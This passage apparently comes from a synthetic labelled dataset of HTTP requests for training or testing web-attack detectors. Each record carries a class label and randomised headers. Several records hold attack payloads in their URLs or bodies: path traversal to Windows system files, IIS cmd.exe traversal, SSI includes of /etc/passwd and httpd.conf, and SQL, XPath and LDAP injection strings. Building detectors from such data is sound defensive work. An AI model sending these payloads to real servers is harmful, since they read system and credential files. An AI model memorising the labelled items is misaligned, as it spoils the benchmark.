Via: 5.9 167.19.118.201, kv3/4.6 www.mknwTet.jpeg:938, 8.0 200.12.83.154
Transfer-Encoding: gzip
Upgrade: ispEo/3.6, Yt33t/0.8, dlleet/6.1
X-Forwarded-For: 126.226.47.150
X-Serial-Number: 579595075261
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ediutsdbAtw2ilo=tt@o(ne|&6eare6kstOa6N=' or     id    in     (   select     *  from        user_db )&nrdeeWsliewEts=t6VaYF13u5ow&p9esNhaws=871596&hSonity=fz f7g

End - Id: 35147
Start - Id: 45515
class: PathTransversal
GET /tyCTl70B9gUOBQwP/m7lseuiura1nesitue/enatEoiniee/3s6xJLNwmrV/woixhfubtmwaau/haeu/dwZFmEUmvK2yh50-BJ/5iucegsrfea.css?jta6Eo=eaeytroai&remey=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat&ooVfahh=1tzpmng5eo&javf=14 HTTP/1.0
Host: 141.150.243.9
Connection: nn7el
Accept: */*
Accept-Charset: euc-kr;q=0.5, windows-1254;q=0.9, windows-1255, windows-874;q=0.3
Accept-Encoding: compress;q=0.9, gzip;q=0.7, identity;q=0.5, compress
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 247.212.53.148
Cookie: toa7wssnaVmennF=nwddqmSwqP;rmeZg6k=928904;sam8D93passthruAQxbg=17;387eaNdEeTic=H saesoinsert ;Pupdatelm;1secnglC7eotpmn=iLbx
Cookie2: $Version="37"
Date: Sat, 12 Jan 08 08:41:42 GMT
ETag: W/"tUTgFd-kknaldZc"
Expect: 100-continue
From: t2hldl05@oephweoTmr.de
If-Modified-Since: Fri, 22 Feb 08 18:54:19 UTC
If-Unmodified-Since: Fri, 18 Jan 08 17:42:17 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 12
MIME-Version: 8.4
Pragma: grckvd='ea3tyd'
Proxy-Authorization: Basic Q240c1A6bHNqZGRuZ3g=
Authorization: Digest qop=auth
Range: 55569-482846
Referer: /Uans.gif
TE: chunked;q=0.0
Trailer: Accept
User-Agent: Mozilla/3.8 (X11; U; Linux i586 5.6; mn-oa; rv:7.4.4) Gecko/41871417
UA-CPU: x86
UA-Disp: 9630,820,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2096x915
Via: FTP/5.4 177.209.177.206:683, HTTP/3.2 225.189.194.45
Transfer-Encoding: compress
Upgrade: sJn/9.5, owof/5.6, ooi/5.8, beto/7.5
Warning: 336 www.pkli.gif "eE8hyyveresaci5o6et" 
X-Forwarded-For: 59.230.132.58
X-Serial-Number: 8223453
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45515
Start - Id: 36114
class: PathTransversal
GET /nQ_oaV61/9mc/oZYAQQuzt/mJSHw0NPQkS9VPgiXNy/mbktBN9NHPWZ5G/gheo3thecOn0w19Og/oO-0KlAzXWm/swti/we7/0ystresIaht/t9qgWyKps.aspx?uybodyWI738=%3F0n-IandAedsasA%3CO%3D+&e1rllwe7estitno=856521&ipotolrepy6n=wr5r_Mm3l&aeela=rImb&tndo=morow1f&smEn5hixeawhgt=45+evrshcrbIwiT0ip&Cne=36809&lLjnOlocationFXN=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&UE@Sg3UlogzS=mTWgn_RN80p&crnsrw7=ttwehltiilocationIan&Epwlditehmn=Rr3child&UeWb=071357&fchhD=eztbd+ HTTP/1.0
Host: 215.122.240.84
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: deflate, gzip;q=0.5, compress;q=0.2
Accept-Language: *
Cache-Control: max-age=11286
Client-ip: 180.199.9.54
Cookie: ai1eya9E3=74546;ndhc=19437879;itEinsl0El=systemoselecthal=aInbncn\e ;qchnnhin=g52tneiieae;eei=9;l6=ndncddtdgtxyu
Cookie2: $Version="163"
Date: Sun, 09 May 04 18:54:28 CET
ETag: "tJMxSUmbHfv8AsK3jw"
Expect: 100-continue
From: 7Croe@kumvreNv.biz
If-Modified-Since: Thu, 27 Mar 08 18:49:54 CET
If-Unmodified-Since: Fri, 22 Oct 04 18:45:40 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 642
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Digest realm
Range: 9844-66,0-,-297
Referer: http://oebsm8N.cz/eel2wsi.rar
TE: trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/5.5 (compatible; tqH1joi; Win98; ve0xoui1se; eekysEl; nooh)
UA-CPU: MIPS
UA-Disp: 0150,960,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7606x3250
Via: 4.3 www.nhwhomS5.gif, 4.8 www.eienh.js
Transfer-Encoding: bnDo
Upgrade: eniw/0.3, sum/7.6, tRyoa/3.2, eolses/1.6
Warning: 643 99.90.218.216 "i6te3torsbteItixa4tu" 
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 7294579742813634
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36114
Start - Id: 39561
class: SSI
POST /6sumoosohnuxkmee.bin? HTTP/1.0
Content-Length: 384
Content-Language: cottt4,xee,hpst
Content-Encoding: gzip
Content-Location: /ato7yr/anmd/spegpmia/gsstsoel/rah6rn.php3
Content-MD5: c2V5ZWVpb2VtZXVsU3RkWQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Jun 09 03:19:35 GMT
Last-Modified: Mon, 21 Aug 06 23:10:18 UTC
Host: www.fnitehn.uk
Connection: lObckas
Accept: application/*;q=0.9
Accept-Charset: euc-tw;q=0.3, x-mac-cyrillic, us-ascii
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.1
Cache-Control: min-fresh=4
Client-ip: 147.32.196.230
Cookie: oaevqjSygnec=9eeie;yfhaR9bpd=62516;rn=ie9nss5Mpersms;6A0earIiogiraad=Elo0e9Hcots
Cookie2: $Version="879"
Date: Fri, 30 Nov 07 06:25:17 CET
ETag: ".ZpMfbiUz3x2gzQ"
Expect: nmfso8Ea
From: zdt1Ooe@cVtsgan.ch
If-Modified-Since: Fri, 04 Dec 09 12:58:15 CET
If-Unmodified-Since: Sun, 06 Sep 09 14:46:39 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 27 Jan 08 09:59:13 GMT
Max-Forwards: 3243
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: NTLM ZjJzNWlueDhhY29hdHBvZ2VvZWZwcmlyb2ljdDdidm55YXR5eTJpRWV4YWpTZXA=
Authorization: NTLM THR0d2RlZWlscW5yYXRodDF0MGRpd3hhaXN0ZmhzUHN0ZGo1b3dhaG5hc2k=
Range: 80266-6,060-21789
Referer: http://toes.gov/oswpeT/rnhbioEv.php4
TE: trailers,gzip;q=0.3,deflate;q=0.5
Trailer: Referer
User-Agent: oII7s@ http://www.erdcU.fr
UA-Disp: 9090,6972,8
UA-OS: Windows 95
UA-Color: color8
Via: ttbAa/3.4 www.feb5.gif:15029
Transfer-Encoding: gzip
Upgrade: nqe/4.6, tcf/9.3, s1a3ie/5.1, pcoE/9.0, Ier1/7.4
Warning: 138 www.mUgeeihd.jpeg "rr0mHnay7tiSwEpan" "Thu, 22 Mar 07 10:16:04 GMT"
X-Serial-Number: 11507528452920010282
----: --------------------------------------
~~~~~: ~~~~~~~~~~

qABSP8R7Edocument=48iss&ATbincludeVw_=isOI-&iEhocnoshayn=<vari&fimcaleareoa5=1368531&Amaehiil=<!--   #include virtual="/etc/passwd"-->&a9tIt9Aoramt=oyphpu:k5uv sxservicesal &nheeMzdeorgirdh=4r4ecthigroup by$AufidoiEt&HestI=aaexNaty&9taARislua=32&caiqkrgao=o5raea Tsh2N4&n9uoraeazaoro7a=uoveshutdown&sdvo5e=twMH3I7@J7L&enkp=r41aalReeeeeP&esthA=ty&2eH031=76292

End - Id: 39561
Start - Id: 49300
class: XPathInjection
GET /yj/axa@w/hroc/s1nsqJscceezecrngaT/earnjkAr/l74Y/77TmA/Utgccveosmst/uRm1eHimt70dipyrxeE/MmochajgnqsZztJ/d6EDnpRzlLrEN5gE6.png?tpaiyawrLe2at=05580256&thL4=re&ZyFCtyZ65=ays%27+or++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++++or++++%272nS%27%3D%27&4jbV24@=783&i2lrewnugyjgnDy=831480 HTTP/1.0
Host: www.tzEi7Ttqoe.uk
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 249.173.49.26
Cookie: arh=9;uoemerdEB=23684;aa=txmlobjectidl;gyd=h deleteuu;tear8el=8sh
Cookie2: $Version="2"
Date: Mon, 04 Dec 06 23:53:29 UTC
ETag: W/"5oOwunHRVio4Nk9"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Fri, 30 Jul 04 24:56:24 CET
If-Unmodified-Since: Thu, 26 May 05 06:10:19 CET
If-Match: *
If-None-Match: "2NWGpcldd8lm8Nj"
If-Range: Wed, 13 Jun 07 01:41:23 UTC
Max-Forwards: 29
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: Basic ZVNFSlU6MDR0bGNl
Range: 762-
Referer: /bboci/willieda.dll
TE: chunked
Trailer: Trailer
User-Agent: Mozilla/1.3 (X11; U; Solaris 3.4; sA-ii; rv:6.2.3) Gecko/26376661
UA-CPU: MIPS
UA-Disp: 284,977,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7516x496
Via: 8.7 www.R8ag.htm
Transfer-Encoding: rsiydb
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 119 www.rMrCoeV.png "areeivlaiau9le2Crr" "Wed, 01 Jul 09 21:10:21 UTC"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 15070707581939695
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49300
Start - Id: 39567
class: SSI
PUT /qtelnettVpnVpbxterm1t/i./ryvZsKE-2ZBF5/eisugCehwearepm4tg8/lr48eox-kofkZLc@/2Oy2DtN_/ayH/utmkFitnsnyt/eAh3ewueGnte/zrTc2CrOJyl.F/904_lQg@iXVBSA/Tu7wLdB@6.jpeg? HTTP/1.0
Content-Length: 126
Content-Language: sevt6p
Content-Encoding: deflate
Content-Location: /htmbo1t0.swf
Content-MD5: ZXBjdzVobjVkdXJjZWhhdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Dec 08 13:41:11 CET
Last-Modified: Mon, 09 Jan 06 14:49:46 GMT
Host: www.tbhjs.de
Connection: srYdzelf
Accept: image/jpeg, audio/*
Accept-Charset: *
Accept-Encoding: gzip, compress, gzip;q=0.7, compress;q=0.9
Accept-Language: un5cel9-rk6h;q=0.6, elssitse-adet, jtDtrsn-gcu, 5n7-e;q=0.3
Cache-Control: max-age=9080
Client-ip: 222.71.177.248
Cookie: me2=%;sgUnbso8oher=enrnpaoa9varnoY;7idhaskuesdntra=6aHlho4sooc
Cookie2: $Version="24"
Date: Thu, 31 Mar 05 08:15:15 CET
ETag: W/"vZcMQZwfRNN7OOS96"
Expect: 100-continue
From: aweeee@nAyt.uk
If-Modified-Since: Wed, 29 Apr 09 18:32:44 CET
If-Unmodified-Since: Mon, 28 Jul 08 11:13:49 GMT
If-Match: ".pWFlEZtIRHo2b2NVp"
If-None-Match: *
If-Range: Fri, 26 Jan 07 08:21:10 UTC
Max-Forwards: 550
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: NTLM UjRpaXRwbWYxb2phZG9lbmE5R3dvYmVuOXVvaHY4aXJhenQ=
Authorization: NTLM THR0d2RlZWlscW5yYXRodDF0MGRpd3hhaXN0ZmhzUHN0ZGo1b3dhaG5hc2k=
Range: 55851-,73887-,-7
Referer: http://80auj.it/sotxt5.shtml
TE: trailers,chunked;q=0.2,deflate
Trailer: Pragma
User-Agent: nntlrseyaiae6lr
UA-Disp: 9131,8742,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 645x141
Via: HTTP/0.0 120.190.157.251:7441
Transfer-Encoding: compress
Upgrade: nqe/4.6, tcf/9.3, s1a3ie/5.1, pcoE/9.0, Ier1/7.4
Warning: 705 73.205.19.33:824 "uGhloLhinanOnahntN" 
X-Serial-Number: 7950474453739700165
----: ------------------
~~~~~: ~~~~~~~~~~

hlO7lfs0='su&daoheshhlutoeb=oPHikLOt&xOsautoexecvF_9-=<!--#include virtual="/etc/httpd/httpd.conf"   -->

End - Id: 39567
Start - Id: 40804
class: SSI
GET /TNS4connect5sWidkz/aKa7bKgWSwhzzTTV/GVeDX.aspx?EiOdEnmsEmstjTn=8&el=620568&_0_Oswfwinnt=958&p0stdinYqcexecTB.=eK1-&4ltOwoeGtwe=ett2trsmtt7ocgo&L0.2zOQf=Yn0D%5D09b&nqe=332911&r51rAo=nt%29m8ttalln9%3Ceo&saoeto5b=ircpp&5aanJyghoNi3i6i=%3C%21--%23odbc+++connect%3D%22tozaHjv%2Cea6%2Cdiett%22++++++statement%3D%22select+++++*++from+++v4be1%22--%3E&iv@XZsam=oEu7acaex2eict7rwn&hTayuSaoobc=etlexecuya%3F HTTP/1.1
Host: 176.208.198.23
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.1
Cache-Control: max-stale=8
Client-ip: 255.59.165.34
Cookie: EihX=uela ;ihaiietTzkvr=E;iosenm=raeyoaBB4
Cookie2: $Version="313"
Date: Sun, 11 Apr 04 02:10:52 GMT
ETag: "RvbSK2h6WYj87MpwHja"
Expect: snetell=1iri3waa
From: iiljwdi@httr81j.de
If-Modified-Since: Thu, 04 Jun 09 06:55:00 UTC
If-Unmodified-Since: Sun, 30 Jul 06 04:42:45 UTC
If-Match: "HfGZfJ17aNywWXMXF8wJ"
If-None-Match: *
If-Range: "B3nO_xrZVtt8niL1iuye"
Max-Forwards: 4
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: NTLM cG5oSmFzbnMyYWM1bHNjbm9tU3NnbG5iYTB0emRoT29wd25sdWhuZmVobQ==
Authorization: Basic dGxtODpzZWEyZWkz
Range: 89010-,593978-8589,-17027
Referer: http://www.2kr9n.de/tf2uiegr/lthpl/snneea/hakprs/enhsln3h.txt
TE: trailers,trailers,gzip
Trailer: Range
User-Agent: ssqdottka/5.0
UA-CPU: 68000
UA-Disp: 327,318,8
UA-OS: Win98
UA-Pixels: 871x928
Via: sts/5.5 www.aobtd.shtml, 4.8 www.Ioma.css:5
Transfer-Encoding: deflate
Upgrade: adlr/3.8, ehsO/1.6, anah/5.9, zlni/3.4
Warning: 985 www.atEa.jpg:824 "esoj" "Tue, 11 Nov 08 09:01:56 UTC"
X-Serial-Number: 17196143235816087076
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40804
Start - Id: 43964
class: OsCommanding
GET ..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.fndtoEatrM.fr:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-8859-3, cp-932;q=0.3, koi8;q=0.1, windows-1257
Accept-Encoding: *
Accept-Language: ueOty-NvmwOno;q=0.9, u8xn-npihM8c, 7gs-2ctceh, auo6-ol
Cache-Control: max-stale=1
Client-ip: 112.139.123.3
Cookie: eArsu=407;TA@rE=Sayeghniro8ge
Cookie2: $Version="45"
Date: Tue, 04 Apr 06 07:10:16 GMT
ETag: "KgvdimAZzmUx0@VVDP"
Expect: naaaaho=iektd;i12sv
From: axenii@lMdner.de
If-Modified-Since: Wed, 06 Jun 07 12:18:26 UTC
If-Unmodified-Since: Thu, 08 Apr 10 24:10:30 UTC
If-Match: "-p2rLxjVRyesjAFX.Q"
If-None-Match: *
If-Range: "3bXCa8ykymYIGI.C1o"
Max-Forwards: 1750
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM bmxnaGZjaGlvaHRyYm50MDZicmlncFptY3FUc25pbXp0c3J2YmhodHk=
Authorization: br03 e4lwu=aaEnmq
Range: 2873-08
Referer: /cit4ahin.exe
TE: chunked,trailers
Trailer: Referer
User-Agent: Mozilla/7.0 (X11; U; Unix 7.0; ri-rw; rv:6.4.2) Gecko/96923058
UA-CPU: 68000
UA-Disp: 7638,7203,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2346x026
Via: 7.9 35.81.119.170
Transfer-Encoding: gzip
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 185 www.ayfae.tiff:7 "h2dyo3oifn2sa9H7" 
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43964
Start - Id: 44085
class: OsCommanding
GET /msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 214.25.82.218
Connection: tRez
Accept: audio/*;q=0.6, audio/basic
Accept-Charset: *
Accept-Encoding: compress, identity;q=0.5, gzip;q=0.5, compress, compress
Accept-Language: *;q=0.8
Cache-Control: max-age=3842
Client-ip: 182.213.184.73
Cookie: oIiv=vnqr_b
Cookie2: $Version="0"
Date: Fri, 01 Jun 07 16:15:38 GMT
ETag: "5Sy.3KRtylhzA5H"
Expect: ugrhejx
From: ixam@eaec.uk
If-Modified-Since: Sat, 10 May 08 02:22:46 GMT
If-Unmodified-Since: Wed, 28 Oct 09 11:22:25 CET
If-Match: "KUoJ4vK7fOF8Y3B"
If-None-Match: *
If-Range: "Bgk78tIdC6rpnZuB2R"
Max-Forwards: 131
MIME-Version: 3.7
Pragma: o8na='dama'
Proxy-Authorization: elsyeo wweq2teU=ecoga5u
Authorization: Basic dmVtdGw6NHRoZWhl
Range: 70-
Referer: http://www.cmhgrht.biz/auf7int/boopne2x/Ue48eGau.pl
TE: trailers,deflate,deflate
Trailer: Authorization
User-Agent: eew7Uiecl
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1501x189
Via: w2he/7.4 www.ohoaiall.png, tatd/2.3 www.lrtNeuo.htm
Transfer-Encoding: 2cou23
Upgrade: unHis2/9.7, sDw/8.7
Warning: 085 103.13.130.10 "4nt6qytseorniY" 
X-Forwarded-For: 180.219.181.140
X-Serial-Number: 388289600968011
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44085
Start - Id: 38638
class: LdapInjection
GET /kToWpasswdetcconnectj5Nm/oe3cwk6CPBR94KXpkP/2xtpcpjeI/oata3/LalO5Ips4Qor5/nrHs/fttitten.nsf?OaWkZ1n5=716&VncxmlN8HmyJBo=beest%29%28+++%7C+++%28ns%3D*%29&puuoqsquoay=hyEgn%3Fd+%25i%25u&8oi=dItoelorDof9s&ehniemdn5saeU2=8501&eo1fejrsbibere=888320710 HTTP/1.1
Host: www.eetLn.com
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: gzip;q=0.9, gzip
Accept-Language: neqo-pOTseol, iQEh-l, 55sd-ex0a5z;q=0.3
Cache-Control: min-fresh=9178
Client-ip: 86.88.22.136
Cookie: eo0o=servicesisouspnvld>c 0a;ftTrcdph2rben=nlneipasswd&FaLBr i;ab3hewO36=mOynld0;mstjsbestm=mijtNpneegubnl1
Cookie2: $Version="732"
Date: Sat, 04 Dec 04 21:53:01 GMT
ETag: W/"vITvz6y6nZ8bl.S"
Expect: 100-continue
From: tn0thejR@aoGrudsiow.st
If-Modified-Since: Thu, 04 Jun 09 06:47:30 GMT
If-Unmodified-Since: Thu, 22 Feb 07 18:25:02 UTC
If-Match: *
If-None-Match: "dvqS8FclMEg-irtK0a"
If-Range: Fri, 06 Jan 06 19:52:42 CET
Max-Forwards: 9084
MIME-Version: 9.0
Pragma: rverote='psa'
Proxy-Authorization: NTLM dGRrNTRlNG5ubG1kSGxuZXpzRW90ZWZkdHMydXlnbHJkc3I3bndHb2V5aGU=
Authorization: NTLM dWVFZWNnN1NlZVVlcE1oaUxpVHR5bWVxdG9SaWVsYUxvcm5zbjRlcmN6dG4=
Range: 25834-,48-325537
Referer: /Owrbho7/dUte/thOrcvpd.tiff
TE: deflate;q=0.9,chunked;q=0.3,deflate;q=0.0
Trailer: If-Modified-Since
User-Agent: Mozilla/9.1 (X11; U; SunOS sun4u 9.3; tg-ei; rv:2.5.8) Gecko/93286404
UA-CPU: MIPS
UA-Disp: 397,637,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 601x4009
Via: HTTP/7.0 19.18.247.233
Transfer-Encoding: identity
Upgrade: ehlec/7.4, tt07/0.9, ls7e/0.7
Warning: 509 249.249.5.171 "evmsicsfdrnmFbad" 
X-Forwarded-For: 72.129.37.147
X-Serial-Number: 3254523964
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38638
Start - Id: 42371
class: SqlInjection
GET /e.AKDH-/ZucpassthruB5FLnHXImH/tltanezesEetraud7fev/egIeoe.png?sDittO0=4&sxa=lae4xtermcopypkA7sea&dgml=sc%28&emgih=5527052620&zsoceisw=024091439&iosr=osc+e&etep=ewindow.openos&o2l=ej&ecwikyIee=3482065607&rn=%27select++customer_phone+%27%7C%7C%27from+++customers++++%27%7C%7C%27where++++customer_surname%3D%27%27%27%7C%7C+lv_surname%7C%7C%27%27%27+++++and+customer_type%3D1%27%3B&prenO5htour=733&rths4r=a&eo0Y=thw349%40O HTTP/1.0
Host: 89.253.218.2
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: oeoht6lS-tgdv, eair-etdeehNo;q=0.1, x33Loysi-Ozgmat1, rrEoTme-RxfgE, h-f;q=0.5
Cache-Control: max-age=2783
Client-ip: 9.111.68.72
Cookie: gensyeomdUned=238;on4Uith=isameoOn9%ad;ntdIr=rIz]
Cookie2: $Version="6"
Date: Tue, 06 May 08 18:01:13 GMT
ETag: ".pHQcBCpLNiI3Vv"
Expect: yslocn=vUdhtgTh;enre
From: orh6@rgaag.org
If-Modified-Since: Sat, 19 Mar 05 14:56:26 CET
If-Unmodified-Since: Wed, 01 Aug 07 08:33:17 UTC
If-Match: "Io2f5Mr4Y3OTmUcqp"
If-None-Match: *
If-Range: Thu, 26 Jun 08 03:53:58 GMT
Max-Forwards: 4901
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: dlmr slzlneo=pHmge92s
Authorization: Basic eWVpZGFiOmxkbDdo
Range: -966,396-333,-3990
Referer: /Ttq6Se/slrrnimu/a4en.pl
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: AhaosyAr (ovKBqIjxD; gRyzSfEPC; 8YXhVRkbx; g-5ilYEJXo)
UA-CPU: MIPS
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1475x116
Via: FTP/4.4 www.9Oom.shtml, 2.3 www.ypltTcd.css:8, 1.1 217.132.25.43
Transfer-Encoding: h2e0an; l3edmih=theNo
Upgrade: Ia7/5.5, mnd/4.4, irt/6.7
Warning: 423 132.125.191.161:87 "rdoiorrnoghcct9sL6ci" 
X-Forwarded-For: 13.105.161.65
X-Serial-Number: 71261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 42371
Start - Id: 39752
class: SSI
GET /i25ewSuRcCdd5z/esevd1ia/sutNoleil/pp6rsGlp9ju4H7/HdegheiY0Psihdlms3h/gewCE5ONBafSLBytZZcm/79-Rphon5XC.jpeg?Obnode0a@K-5oG=Itu&whaOtla=%3C%21--++%23include+++virtual%3D%22%2Fetc%2Fpasswd%22++++--%3E HTTP/1.1
Host: www.nuidsjtmn.it
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: big5, us-ascii, windows-1254;q=0.3, x-mac-cyrillic
Accept-Encoding: 
Accept-Language: p-k;q=0.5, o-eotfk;q=0.1, R0holR7-dtr6;q=0.2, 9eftr-r
Cache-Control: max-age=188
Client-ip: 230.191.177.45
Cookie: nUysWtelnet4Kall=2(1o
Cookie2: $Version="098"
Date: Tue, 19 Jul 05 02:25:19 CET
ETag: W/"T6v1gOR1o6OyhoM"
Expect: 7atT=ybaN
From: ls8tIstr@r3edte.de
If-Modified-Since: Wed, 10 Sep 08 20:36:41 GMT
If-Unmodified-Since: Fri, 31 Dec 04 10:08:36 CET
If-Match: "hdKwoB-gsr5C2jZDq"
If-None-Match: "Sxgz__kQ-nNDn4X6yIs"
If-Range: *
Max-Forwards: 9
MIME-Version: 3.3
Pragma: cOrai=iXLpec
Proxy-Authorization: Digest algorithm=rOwsg8ds
Authorization: reaDt emvtgetu=inssramo
Range: 85-,34121-
Referer: http://www.etulMXe.net/eutnrc.asp
TE: trailers
Trailer: Date
User-Agent: slH0LPFQB. http://www.uieAdnp.net
UA-CPU: 68000
UA-Disp: 377,8023,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5615x413
Via: 6.4 224.169.35.54
Transfer-Encoding: identity
Upgrade: ti5dle/9.6, cdcl/9.9, hne5h/3.5, uet/1.4
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 141.175.190.115
X-Serial-Number: 37299896
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39752
Start - Id: 49634
class: XPathInjection
GET /dgkzdud1Jo/sNF.tiff?sliEA4etga=st8Tzqwy6e8wp-eunr%25&a8uetiWnvTgt=pyrie&Oo=ecz%3Chfdupre&sshibtyZexhrmN5=eegrmi5Xqto&x9metaVmhE=eCne&OernA4og=2+++or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or+2154%3D&9WobjectUo=4g&eAI2eOewmele=tnh%25ms+T HTTP/1.0
Host: 212.135.212.61
Connection: rbiSe
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.0, compress, gzip, compress;q=0.7, compress
Accept-Language: 8ynE-ghno;q=0.9, snohgrt-ed, ytxp2-otij;q=0.9, g-sie
Cache-Control: ehrm=biicsll
Client-ip: 77.18.73.164
Cookie: wlee=y-YM;hsc=udatxnI7 mOupdates;wesoghwtzdTi=xTZ;xb70u.iqQz9=1517465
Cookie2: $Version="94"
Date: Fri, 01 May 09 12:06:43 UTC
ETag: "oaaS6UjlvBpJfRDrhU"
Expect: roznzstA
From: nUasei3i@d2es4pty6e.biz
If-Modified-Since: Sat, 05 May 07 16:23:39 CET
If-Unmodified-Since: Wed, 17 Mar 04 15:57:59 GMT
If-Match: "qfAA7nJNkKFk.8b31.s"
If-None-Match: "nrSLm7eJrHVLW8u"
If-Range: "iIKqlU8PYb5gu_scVhG"
Max-Forwards: 5
MIME-Version: 1.5
Pragma: t2trt6=vsaT
Proxy-Authorization: NTLM bTdJZm9od3JhZXRidXJsMGJlbWtkemQ3RXVyZWVzanJkbHNnbjI=
Authorization: Digest qop=auth
Range: 31-025167,936-84
Referer: http://www.0mcre.biz/mxnoa/eete/nansshpe/wuii.pdf
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: udfedls (tdem@.-_; iCJm8YN; cf.j-CU; tPB6E97Y3; m0Gev6kKqI)
UA-CPU: PowerPC
UA-Disp: 3477,0438,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 3223x940
Via: 5.1 www.wogc.jpeg
Transfer-Encoding: compress
Upgrade: hZair/3.0, n6coi/9.2, gii/4.7
Warning: 524 www.ufdAk.gif "c7tvlttbVv" 
X-Forwarded-For: 89.198.76.55
X-Serial-Number: 903451462
----: -------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49634
Start - Id: 35506
class: XPathInjection
GET /BxmIH/dfnEiye/trtjcEsrioA0/nnuuHwaiStr6e/s.ORG-RlZcp2_/ttttodilwioeecon8o6i/izxI/uaeooitwtsedyiae/uolFZpp/ge8hdsejtiaf.swf?nnLyteseys8dptc=favc%3Cdi&wNngrU67=n%40Ree4teueea&ioznwtnsie=p0apbesEikvoiopi&ne=oe8-a&tdp=e0-&yiulodw=rj97anoaew&i4c=%3Aop%3Dl+%7CTngevalpanT&baeee1rtibei=s+dno+&ftlt1smdte4hee=nEBmk&tttererOesi=H3sGsve&Fx8usr1mw=097090&UHA=oraoT HTTP/1.0
Host: www.A64m6tn.net
Connection: close
Accept: video/mpeg;q=0.3, application/*
Accept-Charset: windows-1257, windows-1254;q=0.7, big5;q=0.7
Accept-Encoding: *;q=0.7
Accept-Language: oo-nya, h-hbey5u, h8wh-qwee6sth;q=0.3
Cookie: dnyurib=a/h/inuho8/child::node()[  position()=78] |   iur/ees/nesoiz/child::text()[position()=556]     or 'tmn'   ='
Date: Mon, 26 Dec 05 13:21:49 UTC
If-Match: "BSWOns@@KCf-ZI1"
Pragma: f=nsuuNl3a
Referer: http://5D5weoc.uk/e6rntte5.php4
User-Agent: RnteieNore/5.7.2
UA-OS: FreeBSD

null

End - Id: 35506
Start - Id: 48463
